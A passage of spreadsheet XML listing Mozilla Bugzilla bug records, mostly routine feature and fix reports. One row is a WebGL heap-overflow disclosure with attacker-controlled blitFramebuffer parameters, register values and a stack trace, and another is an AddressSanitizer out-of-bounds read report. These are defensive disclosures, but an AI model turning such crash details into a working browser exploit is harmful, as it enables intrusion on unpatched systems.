        </is>
      </c>
      <c r="I399" t="inlineStr">
        <is>
          <t>Core Graveyard</t>
        </is>
      </c>
      <c r="J399" t="inlineStr">
        <is>
          <t>Security: UI</t>
        </is>
      </c>
      <c r="K399" t="inlineStr">
        <is>
          <t>Other Branch</t>
        </is>
      </c>
      <c r="L399" t="inlineStr">
        <is>
          <t>PowerPC</t>
        </is>
      </c>
      <c r="M399" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N399" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O399" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P399" t="inlineStr"/>
      <c r="Q399" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R399" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S399" t="inlineStr">
        <is>
          <t>psm2.2</t>
        </is>
      </c>
      <c r="T399" t="n">
        <v>1</v>
      </c>
      <c r="U399" t="n">
        <v>0</v>
      </c>
      <c r="V399" t="n">
        <v>27</v>
      </c>
      <c r="W399" t="inlineStr">
        <is>
          <t>I am running a Carbon, optimized build of the Mozilla trunk
with NSS 3.4 on OS X.  I am using the Modern skin.  (The
Classic skin would crash Mozilla    
When visiting a secure site such as www.etrade.com, Mozilla
gives the error message:
  There is a problem with the certificate that identifies
  "www.etrade.com". Do you want to continue?
  The certificate was issued by a certificate authority
  that Mozilla does not recognize.</t>
        </is>
      </c>
      <c r="X399" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="400">
      <c r="A400" t="n">
        <v>486050</v>
      </c>
      <c r="B400" t="inlineStr">
        <is>
          <t>2009-03-30 18:38:20 -0700</t>
        </is>
      </c>
      <c r="C400" t="inlineStr">
        <is>
          <t>Bugzilla should prefill quicksearch box when showing search results from a quicksearch</t>
        </is>
      </c>
      <c r="D400" t="inlineStr">
        <is>
          <t>2010-10-18 15:55:34 -0700</t>
        </is>
      </c>
      <c r="E400" t="n">
        <v>1</v>
      </c>
      <c r="F400" t="n">
        <v>1</v>
      </c>
      <c r="G400" t="n">
        <v>4</v>
      </c>
      <c r="H400" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I400" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J400" t="inlineStr">
        <is>
          <t>User Interface</t>
        </is>
      </c>
      <c r="K400" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L400" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M400" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N400" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O400" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P400" t="inlineStr"/>
      <c r="Q400" t="inlineStr">
        <is>
          <t>P3</t>
        </is>
      </c>
      <c r="R400" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S400" t="inlineStr">
        <is>
          <t>Bugzilla 4.0</t>
        </is>
      </c>
      <c r="T400" t="n">
        <v>1</v>
      </c>
      <c r="U400" t="n">
        <v>0</v>
      </c>
      <c r="V400" t="n">
        <v>6</v>
      </c>
      <c r="W400" t="inlineStr">
        <is>
          <t>User-Agent:       Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.2) Gecko/20040804 Netscape/7.2 (ax)
Build Identifier: 
After performing a search, the search terms for the just conducted search should be prefilled into the search input box.  Right now it clears the search terms.  This makes it annoying to modify ur search if u want to just tweak it.  U have to retype everything or remember to copy it to the clipboard first.  Yahoo and Google prefill the old search terms on the results page; Bugzilla should too.
Reproducible: Always
Steps to Reproduce:
1. Run any search
Actual Results:  
Search terms are cleared.
Expected Results:  
Search terms are prefilled into the search box on the results page.</t>
        </is>
      </c>
      <c r="X400" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="401">
      <c r="A401" t="n">
        <v>573887</v>
      </c>
      <c r="B401" t="inlineStr">
        <is>
          <t>2010-06-22 19:25:31 -0700</t>
        </is>
      </c>
      <c r="C401" t="inlineStr">
        <is>
          <t>Tuxedo script should not add en-US as single language</t>
        </is>
      </c>
      <c r="D401" t="inlineStr">
        <is>
          <t>2013-08-12 21:54:08 -0700</t>
        </is>
      </c>
      <c r="E401" t="n">
        <v>1</v>
      </c>
      <c r="F401" t="n">
        <v>1</v>
      </c>
      <c r="G401" t="n">
        <v>5</v>
      </c>
      <c r="H401" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I401" t="inlineStr">
        <is>
          <t>Release Engineering</t>
        </is>
      </c>
      <c r="J401" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K401" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L401" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M401" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N401" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O401" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P401" t="inlineStr">
        <is>
          <t>[bouncer]</t>
        </is>
      </c>
      <c r="Q401" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R401" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S401" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T401" t="n">
        <v>1</v>
      </c>
      <c r="U401" t="n">
        <v>0</v>
      </c>
      <c r="V401" t="n">
        <v>4</v>
      </c>
      <c r="W401" t="inlineStr">
        <is>
          <t>The script got used to add SeaMonkey 2.0.5 to bouncer (bug 565309) but added en-US as the only 'product language'. bouncer would only serve en-US requests and 404'd for any other ?lang=foo. Deleting the en-US entry fixed that, so lets modify the script to have better a default.</t>
        </is>
      </c>
      <c r="X401" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="402">
      <c r="A402" t="n">
        <v>1663466</v>
      </c>
      <c r="B402" t="inlineStr">
        <is>
          <t>2020-09-07 09:21:12 -0700</t>
        </is>
      </c>
      <c r="C402" t="inlineStr">
        <is>
          <t>Heap Overflow in webGL PixelbyPixel</t>
        </is>
      </c>
      <c r="D402" t="inlineStr">
        <is>
          <t>2024-05-30 10:18:28 -0700</t>
        </is>
      </c>
      <c r="E402" t="n">
        <v>1</v>
      </c>
      <c r="F402" t="n">
        <v>1</v>
      </c>
      <c r="G402" t="n">
        <v>3</v>
      </c>
      <c r="H402" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I402" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J402" t="inlineStr">
        <is>
          <t>Graphics: CanvasWebGL</t>
        </is>
      </c>
      <c r="K402" t="inlineStr">
        <is>
          <t>80 Branch</t>
        </is>
      </c>
      <c r="L402" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M402" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N402" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O402" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P402" t="inlineStr">
        <is>
          <t>[sec-survey][adv-main84+][adv-esr78.6+]</t>
        </is>
      </c>
      <c r="Q402" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R402" t="inlineStr">
        <is>
          <t>S3</t>
        </is>
      </c>
      <c r="S402" t="inlineStr">
        <is>
          <t>85 Branch</t>
        </is>
      </c>
      <c r="T402" t="n">
        <v>1</v>
      </c>
      <c r="U402" t="n">
        <v>0</v>
      </c>
      <c r="V402" t="n">
        <v>48</v>
      </c>
      <c r="W402" t="inlineStr">
        <is>
          <t>Created attachment 9174247
poc-vcrunitme.html
User Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0
Steps to reproduce:
The crash happens at VCRUNTIME140!memcpy+0xa2 which is called by libGLESv2!rx::`anonymous namespace'::StretchedBlitNearest_PixelByPixel.
In function StretchedBlitNearest_PixelByPixel the destination address for memory write is calculated by: 
uint8_t *destPixel =  destData + writeRow * destRowPitch + writeColumn * destPixelStride + writeOffset;
From the above instruction writeRow and writeColumn can be controlled by the user input:
gl1.blitFramebuffer( 453, 17, 457, 21, 8400, 160, 8404, 164, gl1.STENCIL_BUFFER_BIT, gl1.NEAREST );
In the same function the source address for memory read is calculated by:
const uint8_t *sourcePixel = sourceData + readRow * sourceRowPitch + readColumn * srcPixelStride + readOffset;
The sourcePixel value can also be controlled by the user inputs readRow and readColumn.
Actual syntax for blitFramebuffer is:
void gl.blitFramebuffer(srcX0, srcY0, srcX1, srcY1,dstX0, dstY0, dstX1, dstY1,                    mask, filter);
User controlled values affecting source and destination addresses,
•	writeRow 	=  destY0 
•	writeColumn 	=  destX0
•	readRow 	=  srcY0
•	readColumn 	=  srcX0
Additionally, the value for destRowPitch can also be modified from the below webgl function:
gl1.renderbufferStorage( gl1.RENDERBUFFER, gl1.DEPTH_STENCIL, 4, 4 );
Here the 3rd and the 4th parameter are width and height which are used for the calculation of destRowPitch.
From the values provided in the above mentioned blitFramebuffer function the source and the destination address can be modified as follows:
 Register values at crash:
rax=00000150f9a04343 rbx=00000150f9a04343 rcx=0000000000000000
rdx=00000150fb671717 rsi=0000004d6d7fcfe8 rdi=0000004d6d7fd060
rip=00007ffe72bb1392 rsp=0000004d6d7fcb18 rbp=00000000000020d0
 r8=0000000000000001  r9=00007ffe72bb0000 r10=00000150fb671717
r11=00000150f9a04343 r12=00000150fb671003 r13=00000000000000a0
r14=00000000000020d4 r15=0000004d6d7fd050
iopl=0         nv up ei pl nz na pe nc
cs=0033  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010202
VCRUNTIME140!memcpy+0xa2:
00007ffe`72bb1392 8808            mov     byte ptr [rax],cl ds:00000150`f9a04343=??
From the above register values, rax and rbx contain the destination address (destPixel) modifiable by the user. rdx  and r10 contain the source address (sourcePixel) modifiable by the user. Registers rbp, r13 and r14 contain the values of dstX0, dstY0 and dstX1 from blitFramebuffer function.
Actual results:
00 0000004d`6d7fcb18 00007ffe`58a31b93     VCRUNTIME140!memcpy+0xa2 [d:\agent\_work\2\s\src\vctools\crt\vcruntime\src\string\amd64\memcpy.asm @ 255] 
01 (Inline Function) --------`--------     libGLESv2!rx::`anonymous namespace'::StretchedBlitNearest_PixelByPixel+0x145 [/builds/worker/checkouts/gecko/gfx/angle/checkout/src/libANGLE/renderer/d3d/d3d11/Blit11.cpp @ 124] 
02 0000004d`6d7fcb20 00007ffe`58a31eaa     libGLESv2!rx::`anonymous namespace'::StretchedBlitNearest+0x2f3 [/builds/worker/checkouts/gecko/gfx/angle/checkout/src/libANGLE/renderer/d3d/d3d11/Blit11.cpp @ 158] 
03 0000004d`6d7fcc10 00007ffe`58a315c9     libGLESv2!rx::Blit11::copyAndConvertImpl+0x25a [/builds/worker/checkouts/gecko/gfx/angle/checkout/src/libANGLE/renderer/d3d/d3d11/Blit11.cpp @ 1271] 
04 0000004d`6d7fcd30 00007ffe`58a31063     libGLESv2!rx::Blit11::copyAndConvert+0x199 [/builds/worker/checkouts/gecko/gfx/angle/checkout/src/libANGLE/renderer/d3d/d3d11/Blit11.cpp @ 1308] 
05 0000004d`6d7fce40 00007ffe`58a55a41     libGLESv2!rx::Blit11::copyDepthStencilImpl+0x193 [/builds/worker/checkouts/gecko/gfx/angle/checkout/src/libANGLE/renderer/d3d/d3d11/Blit11.cpp @ 1211] 
06 0000004d`6d7fcf20 00007ffe`58a40069     libGLESv2!rx::Renderer11::blitRenderbufferRect+0xb51 [/builds/worker/checkouts/gecko/gfx/angle/checkout/src/libANGLE/renderer/d3d/d3d11/Renderer11.cpp @ 0] 
07 0000004d`6d7fd160 00007ffe`58a0207f     libGLESv2!rx::Framebuffer11::blitImpl+0x3e9 [/builds/worker/checkouts/gecko/gfx/angle/checkout/src/libANGLE/renderer/d3d/d3d11/Framebuffer11.cpp @ 366] 
08 0000004d`6d7fd250 00007ffe`589621c3     libGLESv2!rx::FramebufferD3D::blit+0x6f [/builds/worker/checkouts/gecko/gfx/angle/checkout/src/libANGLE/renderer/d3d/FramebufferD3D.cpp @ 286] 
09 0000004d`6d7fd2d0 00007ffe`5893ea22     libGLESv2!gl::Framebuffer::blit+0x53 [/builds/worker/checkouts/gecko/gfx/angle/checkout/src/libANGLE/Framebuffer.cpp @ 1551] 
0a 0000004d`6d7fd320 00007ffe`58afe9d9     libGLESv2!gl::Context::blitFramebuffer+0x162 [/builds/worker/checkouts/gecko/gfx/angle/checkout/src/libANGLE/Context.cpp @ 3640] 
0b 0000004d`6d7fd3d0 00007ffe`1fe471d7     libGLESv2!gl::BlitFramebuffer+0xb9 [/builds/worker/checkouts/gecko/gfx/angle/checkout/src/libGLESv2/entry_points_gles_3_0_autogen.cpp @ 169] 
0c 0000004d`6d7fd480 00007ffe`20ca1828     xul!mozilla::gl::GLContext::raw_fBlitFramebuffer+0x97 [/builds/worker/workspace/obj-build/dist/include/GLContext.h @ 2491] 
0d (Inline Function) --------`--------     xul!mozilla::gl::GLContext::fBlitFramebuffer+0x46 [/builds/worker/checkouts/gecko/gfx/gl/GLContext.h @ 2477] 
0e 0000004d`6d7fd530 00007ffe`20c753dc     xul!mozilla::WebGLFramebuffer::BlitFramebuffer+0x978 [/builds/worker/checkouts/gecko/dom/canvas/WebGLFramebuffer.cpp @ 1516] 
0f 0000004d`6d7fd6a0 00007ffe`20c432fe     xul!mozilla::WebGL2Context::BlitFramebuffer+0x22c [/builds/worker/checkouts/gecko/dom/canvas/WebGL2ContextFramebuffers.cpp @ 65] 
10 0000004d`6d7fd760 00007ffe`20c43024     xul!mozilla::ClientWebGLContext::Run&lt;void (mozilla::HostWebGLContext::*)(int, int, int, int, int, int, int, int, unsigned int, unsigned int) const,&amp;mozilla::HostWebGLContext::BlitFramebuffer,int &amp;,int &amp;,int &amp;,int &amp;,int &amp;,int &amp;,int &amp;,int &amp;,unsigned int &amp;,unsigned int &amp;&gt;+0x28e [/builds/worker/checkouts/gecko/dom/canvas/ClientWebGLContext.cpp @ 313] 
11 0000004d`6d7fd860 00007ffe`20866833     xul!mozilla::ClientWebGLContext::BlitFramebuffer+0x94 [/builds/worker/checkouts/gecko/dom/canvas/ClientWebGLContext.cpp @ 3433] 
12 0000004d`6d7fd8e0 00007ffe`1ec91711     xul!mozilla::dom::WebGL2RenderingContext_Binding::blitFramebuffer+0x213 [/builds/worker/workspace/obj-build/dom/bindings/WebGL2RenderingContextBinding.cpp @ 1489] 
13 0000004d`6d7fd9d0 00007ffe`1eb68917     xul!mozilla::dom::binding_detail::GenericMethod&lt;mozilla::dom::binding_detail::NormalThisPolicy,mozilla::dom::binding_detail::ThrowExceptions&gt;+0x101 [/builds/worker/checkouts/gecko/dom/bindings/BindingUtils.cpp @ 3225] 
14 (Inline Function) --------`--------     xul!CallJSNative+0x9e [/builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp @ 485] 
15 0000004d`6d7fda90 00007ffe`2264fffd     xul!js::InternalCallOrConstruct+0x177 [/builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp @ 577] 
16 (Inline Function) --------`--------     xul!InternalCall+0x95 [/builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp @ 640] 
17 (Inline Function) --------`--------     xul!js::CallFromStack+0x95 [/builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp @ 644] 
18 0000004d`6d7fdba0 00007ffe`226684d0     xul!Interpret+0x1add [/builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp @ 0] 
19 (Inline Function) --------`--------     xul!js::RunScript+0x1e3 [/builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp @ 457] 
1a 0000004d`6d7fe0f0 00007ffe`22668665     xul!js::ExecuteKernel+0x2b0 [/builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp @ 832] 
1b 0000004d`6d7fe1b0 00007ffe`227102e7     xul!js::Execute+0x85 [/builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp @ 864] 
1c 0000004d`6d7fe210 00007ffe`1ee035f8     xul!ExecuteScript+0x107 [/builds/worker/checkouts/gecko/js/src/vm/CompilationAndEvaluation.cpp @ 403] 
1d 0000004d`6d7fe2b0 00007ffe`1ee03575     xul!JS_ExecuteScript+0x48 [/builds/worker/checkouts/gecko/js/src/vm/CompilationAndEvaluation.cpp @ 429] 
1e 0000004d`6d7fe300 00007ffe`215240ec     xul!nsJSUtils::ExecutionContext::ExecScript+0x25 [/builds/worker/checkouts/gecko/dom/base/nsJSUtils.cpp @ 337]</t>
        </is>
      </c>
      <c r="X402" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="403">
      <c r="A403" t="n">
        <v>1603100</v>
      </c>
      <c r="B403" t="inlineStr">
        <is>
          <t>2019-12-11 05:37:30 -0800</t>
        </is>
      </c>
      <c r="C403" t="inlineStr">
        <is>
          <t>Remove unused declaration in U2F.cpp</t>
        </is>
      </c>
      <c r="D403" t="inlineStr">
        <is>
          <t>2022-08-17 14:00:53 -0700</t>
        </is>
      </c>
      <c r="E403" t="n">
        <v>1</v>
      </c>
      <c r="F403" t="n">
        <v>1</v>
      </c>
      <c r="G403" t="n">
        <v>7</v>
      </c>
      <c r="H403" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="I403" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="J403" t="inlineStr">
        <is>
          <t>Lint and Formatting</t>
        </is>
      </c>
      <c r="K403" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L403" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M403" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N403" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O403" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P403" t="inlineStr">
        <is>
          <t>[lang=C++]</t>
        </is>
      </c>
      <c r="Q403" t="inlineStr">
        <is>
          <t>P3</t>
        </is>
      </c>
      <c r="R403" t="inlineStr">
        <is>
          <t>minor</t>
        </is>
      </c>
      <c r="S403" t="inlineStr">
        <is>
          <t>mozilla74</t>
        </is>
      </c>
      <c r="T403" t="n">
        <v>1</v>
      </c>
      <c r="U403" t="n">
        <v>0</v>
      </c>
      <c r="V403" t="n">
        <v>30</v>
      </c>
      <c r="W403" t="inlineStr">
        <is>
          <t>Filling as a good first bug to learn workflows.
These line seems to be unused:
https://searchfox.org/mozilla-central/source/dom/u2f/U2F.cpp#34
As the change is trivial, it is just to learn how to contribute to Firefox.
Found by clang diag https://clang.llvm.org/docs/DiagnosticsReference.html#wunused-variable
Tutorial to contribute:
https://firefox-source-docs.mozilla.org/tools/docs/contribute/how_to_contribute_firefox.html</t>
        </is>
      </c>
      <c r="X403" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="404">
      <c r="A404" t="n">
        <v>801330</v>
      </c>
      <c r="B404" t="inlineStr">
        <is>
          <t>2012-10-13 13:01:12 -0700</t>
        </is>
      </c>
      <c r="C404" t="inlineStr">
        <is>
          <t>out-of-bounds-read in nsCodingStateMachine::NextState</t>
        </is>
      </c>
      <c r="D404" t="inlineStr">
        <is>
          <t>2014-11-19 19:36:03 -0800</t>
        </is>
      </c>
      <c r="E404" t="n">
        <v>1</v>
      </c>
      <c r="F404" t="n">
        <v>1</v>
      </c>
      <c r="G404" t="n">
        <v>3</v>
      </c>
      <c r="H404" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I404" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J404" t="inlineStr">
        <is>
          <t>Internationalization</t>
        </is>
      </c>
      <c r="K404" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L404" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M404" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N404" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O404" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P404" t="inlineStr">
        <is>
          <t>[asan][adv-main19+]</t>
        </is>
      </c>
      <c r="Q404" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R404" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S404" t="inlineStr">
        <is>
          <t>mozilla19</t>
        </is>
      </c>
      <c r="T404" t="n">
        <v>1</v>
      </c>
      <c r="U404" t="n">
        <v>0</v>
      </c>
      <c r="V404" t="n">
        <v>6</v>
      </c>
      <c r="W404" t="inlineStr">
        <is>
          <t>Created attachment 671125
Testcase
Reproduces on trunk. Open the testcase and change character encoding View-&gt;Character Encoding-&gt;Auto-Detect-&gt;East Asian.
=================================================================
==32448== ERROR: AddressSanitizer global-buffer-overflow on address 0x7f2050d63e60 at pc 0x7f204271648c bp 0x7f20125fbfb0 sp 0x7f20125fbfa8
READ of size 4 at 0x7f2050d63e60 thread T27
    #0 0x7f204271648b in nsCodingStateMachine::NextState(char) extensions/universalchardet/src/base/nsCodingStateMachine.h:37
    #1 0x7f2042720237 in nsEscCharSetProber::HandleData(char const*, unsigned int) extensions/universalchardet/src/base/nsEscCharsetProber.cpp:56
    #2 0x7f204273c9be in nsUniversalDetector::HandleData(char const*, unsigned int) extensions/universalchardet/src/base/nsUniversalDetector.cpp:169
    #3 0x7f20427060b6 in nsXPCOMDetector::DoIt(char const*, unsigned int, bool*) extensions/universalchardet/src/xpcom/nsUdetXPCOMWrapper.cpp:57
    #4 0x7f204270663c in non-virtual thunk to nsXPCOMDetector::DoIt(char const*, unsigned int, bool*) :?
    #5 0x7f203e90c6ed in nsHtml5StreamParser::FinalizeSniffing(unsigned char const*, unsigned int, unsigned int*, unsigned int) parser/html/nsHtml5StreamParser.cpp:584
    #6 0x7f203e916118 in nsHtml5StreamParser::DoStopRequest() parser/html/nsHtml5StreamParser.cpp:1001
    #7 0x7f203e9257a1 in nsHtml5RequestStopper::Run() parser/html/nsHtml5StreamParser.cpp:1027
    #8 0x7f204530f4f0 in nsThread::ProcessNextEvent(bool, bool*) xpcom/threads/nsThread.cpp:612
    #9 0x7f2044fa036b in NS_ProcessNextEvent_P(nsIThread*, bool) objdir-ff-asan-sym/xpcom/build/nsThreadUtils.cpp:220
    #10 0x7f204530732e in nsThread::ThreadFunc(void*) xpcom/threads/nsThread.cpp:256
    #11 0x7f20563eed16 in _pt_root nsprpub/pr/src/pthreads/ptthread.c:156
    #12 0x4c627a in __asan::AsanThread::ThreadStart() ??:?
0x7f2050d63e60 is located 0 bytes to the right of global variable 'ISO2022JPCharLenTable (extensions/universalchardet/src/base/nsEscSM.cpp)' (0x7f2050d63e40) of size 32
  'ISO2022JPCharLenTable (extensions/universalchardet/src/base/nsEscSM.cpp)' is ascii string ''
Shadow byte and word:
  0x1fe40a1ac7cc: f9
  0x1fe40a1ac7c8: 00 00 00 00 f9 f9 f9 f9
More shadow bytes:
  0x1fe40a1ac7a8: 00 00 00 00 00 00 00 00
  0x1fe40a1ac7b0: 00 00 00 00 f9 f9 f9 f9
  0x1fe40a1ac7b8: 00 00 00 00 00 00 00 00
  0x1fe40a1ac7c0: 04 f9 f9 f9 f9 f9 f9 f9
=&gt;0x1fe40a1ac7c8: 00 00 00 00 f9 f9 f9 f9
  0x1fe40a1ac7d0: 00 00 00 00 00 04 f9 f9
  0x1fe40a1ac7d8: f9 f9 f9 f9 00 00 00 00
  0x1fe40a1ac7e0: 00 00 00 00 00 00 00 00
  0x1fe40a1ac7e8: 00 00 00 00 f9 f9 f9 f9
Thread T27 created by T0 here:
    #0 0x4bf8e4 in __interceptor_pthread_create ??:?
    #1 0x7f20563dff8f in _PR_CreateThread nsprpub/pr/src/pthreads/ptthread.c:393
    #2 0x7f20563ddd3c in PR_CreateThread nsprpub/pr/src/pthreads/ptthread.c:476
    #3 0x7f204530a3ee in nsThread::Init() xpcom/threads/nsThread.cpp:322
    #4 0x7f20453213ca in nsThreadManager::NewThread(unsigned int, unsigned int, nsIThread**) xpcom/threads/nsThreadManager.cpp:215
    #5 0x7f2044f9d7fb in NS_NewThread_P(nsIThread**, nsIRunnable*, unsigned int) objdir-ff-asan-sym/xpcom/build/nsThreadUtils.cpp:49
    #6 0x7f203e8b22db in tag_nsresult NS_NewNamedThread_P&lt;13ul&gt;(char const (&amp;) [13ul], nsIThread**, nsIRunnable*, unsigned int) ../../dist/include/nsThreadUtils.h:88
    #7 0x7f203e8b1c49 in nsHtml5Module::GetStreamParserThread() parser/html/nsHtml5Module.cpp:118
    #8 0x7f203e8ff98f in nsHtml5StreamParser parser/html/nsHtml5StreamParser.cpp:164
    #9 0x7f203e6ddc66 in nsHtml5Parser::MarkAsNotScriptCreated(char const*) parser/html/nsHtml5Parser.cpp:575
    #10 0x7f203cd70640 in nsHTMLDocument::StartDocumentLoad(char const*, nsIChannel*, nsILoadGroup*, nsISupports*, nsIStreamListener**, bool, nsIContentSink*) content/html/document/src/nsHTMLDocument.cpp:629
    #11 0x7f203954f60e in nsContentDLF::CreateDocument(char const*, nsIChannel*, nsILoadGroup*, nsISupports*, nsID const&amp;, nsIStreamListener**, nsIContentViewer**) layout/build/nsContentDLF.cpp:413
    #12 0x7f203954c3c2 in nsContentDLF::CreateInstance(char const*, nsIChannel*, nsILoadGroup*, char const*, nsISupports*, nsISupports*, nsIStreamListener**, nsIContentViewer**) layout/build/nsContentDLF.cpp:207
    #13 0x7f20414a2b17 in nsDocShell::NewContentViewerObj(char const*, nsIRequest*, nsILoadGroup*, nsIStreamListener**, nsIContentViewer**) docshell/base/nsDocShell.cpp:7927
    #14 0x7f204149ad82 in nsDocShell::CreateContentViewer(char const*, nsIRequest*, nsIStreamListener**) docshell/base/nsDocShell.cpp:7732
    #15 0x7f2041534339 in nsDSURIContentListener::DoContent(char const*, bool, nsIRequest*, nsIStreamListener**, bool*) docshell/base/nsDSURIContentListener.cpp:122
    #16 0x7f2041562eff in nsDocumentOpenInfo::TryContentListener(nsIURIContentListener*, nsIChannel*) uriloader/base/nsURILoader.cpp:654
    #17 0x7f204155e824 in nsDocumentOpenInfo::DispatchContent(nsIRequest*, nsISupports*) uriloader/base/nsURILoader.cpp:356
    #18 0x7f204155d15c in nsDocumentOpenInfo::OnStartRequest(nsIRequest*, nsISupports*) uriloader/base/nsURILoader.cpp:248
    #19 0x7f2037aff3a2 in nsBaseChannel::OnStartRequest(nsIRequest*, nsISupports*) netwerk/base/src/nsBaseChannel.cpp:740
    #20 0x7f2037b00ea6 in non-virtual thunk to nsBaseChannel::OnStartRequest(nsIRequest*, nsISupports*) :?
    #21 0x7f2037b9a644 in nsInputStreamPump::OnStateStart() netwerk/base/src/nsInputStreamPump.cpp:417
    #22 0x7f2037b99841 in nsInputStreamPump::OnInputStreamReady(nsIAsyncInputStream*) netwerk/base/src/nsInputStreamPump.cpp:368
    #23 0x7f2037b9cc5e in non-virtual thunk to nsInputStreamPump::OnInputStreamReady(nsIAsyncInputStream*) :?
    #24 0x7f2045201065 in nsInputStreamReadyEvent::Run() xpcom/io/nsStreamUtils.cpp:82
    #25 0x7f204530f4f0 in nsThread::ProcessNextEvent(bool, bool*) xpcom/threads/nsThread.cpp:612
    #26 0x7f2044fa036b in NS_ProcessNextEvent_P(nsIThread*, bool) objdir-ff-asan-sym/xpcom/build/nsThreadUtils.cpp:220
    #27 0x7f20439437b6 in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) ipc/glue/MessagePump.cpp:82
    #28 0x7f20455e9401 in MessageLoop::RunInternal() ipc/chromium/src/base/message_loop.cc:215
    #29 0x7f20455e9236 in MessageLoop::RunHandler() ipc/chromium/src/base/message_loop.cc:208
    #30 0x7f20455e911b in MessageLoop::Run() ipc/chromium/src/base/message_loop.cc:182
    #31 0x7f2042de527a in nsBaseAppShell::Run() widget/xpwidgets/nsBaseAppShell.cpp:163
    #32 0x7f2041a13f84 in nsAppStartup::Run() toolkit/components/startup/nsAppStartup.cpp:290
    #33 0x7f20379c55ed in XREMain::XRE_mainRun() toolkit/xre/nsAppRunner.cpp:3792
    #34 0x7f20379cb465 in XREMain::XRE_main(int, char**, nsXREAppData const*) toolkit/xre/nsAppRunner.cpp:3858
    #35 0x7f20379ce314 in XRE_main toolkit/xre/nsAppRunner.cpp:3933
    #36 0x40baa3 in do_main(int, char**) browser/app/nsBrowserApp.cpp:174
    #37 0x4091e5 in main browser/app/nsBrowserApp.cpp:279
    #38 0x7f205727076c in ?? ??:0
Stats: 96M malloced (135M for red zones) by 337281 calls
Stats: 4M realloced by 18985 calls
Stats: 73M freed by 210542 calls
Stats: 0M really freed by 0 calls
Stats: 268M (68645 full pages) mmaped in 67 calls
  mmaps   by size class: 8:311277; 9:32764; 10:12285; 11:8188; 12:3072; 13:1536; 14:768; 15:256; 16:704; 17:96; 18:144; 19:8; 20:8;
  mallocs by size class: 8:288647; 9:26533; 10:10394; 11:6886; 12:2044; 13:1166; 14:533; 15:162; 16:694; 17:81; 18:129; 19:6; 20:6;
